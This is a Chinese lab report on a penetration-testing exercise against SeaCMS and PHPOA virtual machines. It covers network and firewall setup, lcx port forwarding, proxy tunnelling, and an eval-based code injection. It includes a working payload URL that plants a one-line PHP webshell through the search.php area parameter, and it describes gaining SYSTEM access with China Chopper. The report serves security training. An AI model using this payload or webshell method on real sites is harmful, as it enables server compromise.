内网渗透测试——端口转发与内网代理渗透测试实验报告 _内网渗透

概述搭载了海洋CMS与phpOA CMS环境的虚拟机进行内网转发与代理的渗透测试，按照实验要求对以上这两个环境进行渗透测试工作，得以下分析报告。
实验环境搭建与配置环境搭建
海洋CMS是用windows 2008 R2系统搭建，PHPOA用linux系统搭建，由于实验环境是事先搭建好了的，所以在这里就不重复了。
环境配置→网络配置
首先我们做的是内网的渗透，所以我们需要配置海洋CMS两个虚拟网卡，两个不同网段的IP，也就是相当于一个是内网，一个是外网，内网连接网的段是跟PHPOA为同一个网段（192.168.80.0/24），内网之间网络要能ping通，外网跟攻击者一个网段（192.168.1.0/24），也要能ping通，攻击者不能直接访问内网，Windows海洋CMS的IP配置（如图1），攻击者IP配置（如图2），Linux的内网IP配置（如图3）。

文章插图
图1

文章插图
图2

文章插图
图3
防火墙配置
海洋CMS服务器防火墙必须开启，防火墙加上两条规则保证web服务能够访问，通过控制面板打开Windows防火墙，点击高级设置，在入站规则和出站规则加上80端口允许连接的规则；而PHPOA 的Linux服务器需要配置以下几条规则（如图4）。
iptables -P INPUT DROP 禁止所有进站链接
iptables -I INPUT -p tcp --dport 80 -j DROP 禁止所有80端口的链接
iptables -I INPUT -s 192.168.80.10 -p tcp --dport 80 -j ACCEPT只允许指定的内网IP访问80端口

文章插图
图4
3.实验原理海洋CMS漏洞原理：
通过代码审计，利用area参数处理过的地方经过字符是否非法判断之后，调用echoSearchPage()函数，因为能执行PHP代码一般就是eval()函数，利用area参数把eval函数带入进去执行。
lcx端口转发原理：
lcx工作原理是使不同端口之间形成一个回路，这样就可以进行端口转发，常用于外网连接内网3389端口。
这个程序主要采用Socket来实现，有几个比较重要的函数：bind2bind、bind2conn、conn2conn及transmitdata 。transmitdata函数是核心，这个函数作用是使得不同端口之间的数据形成一个回路
内网代理原理：
正向代理：Lhost为了访问到Rhost，向proxy发送了一个请求并且指定目标是Rhost，然后proxy向Rhost转交请求并将获得的内容返回给Lhost，简单来说正向代理就是proxy代替了我们去访问Rhost 。
反向代理：Lhost只向proxy发送普通的请求，具体让他转到哪里，proxy自己判断，然后将返回的数据递交回来，这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透
而我们平常使用的reDuh、tunna，和reGeorg一样，都是正向代理。一般都是用户上传一个代理脚本到服务器端，本地的程序去连接服务器上的脚本，脚本程序做代理转发端口和流量。
渗透测试步骤利用到的工具中国菜刀，lcx.exe转发软件，Proxifier代理软件。
进行外网web渗透→拿外网webshell
海洋web通过代码审计可以得出area参数里利用eval()函数把一句话木马带入，把变量打印出来。
Payload:http://192.168.1.109/search.php?searchtype=5&tid=&area=eval($_POST[hah])
之后直接用菜刀链接，密码是hah（如图5），直接就能拿到webshell，而且还是system权限的（如图6）。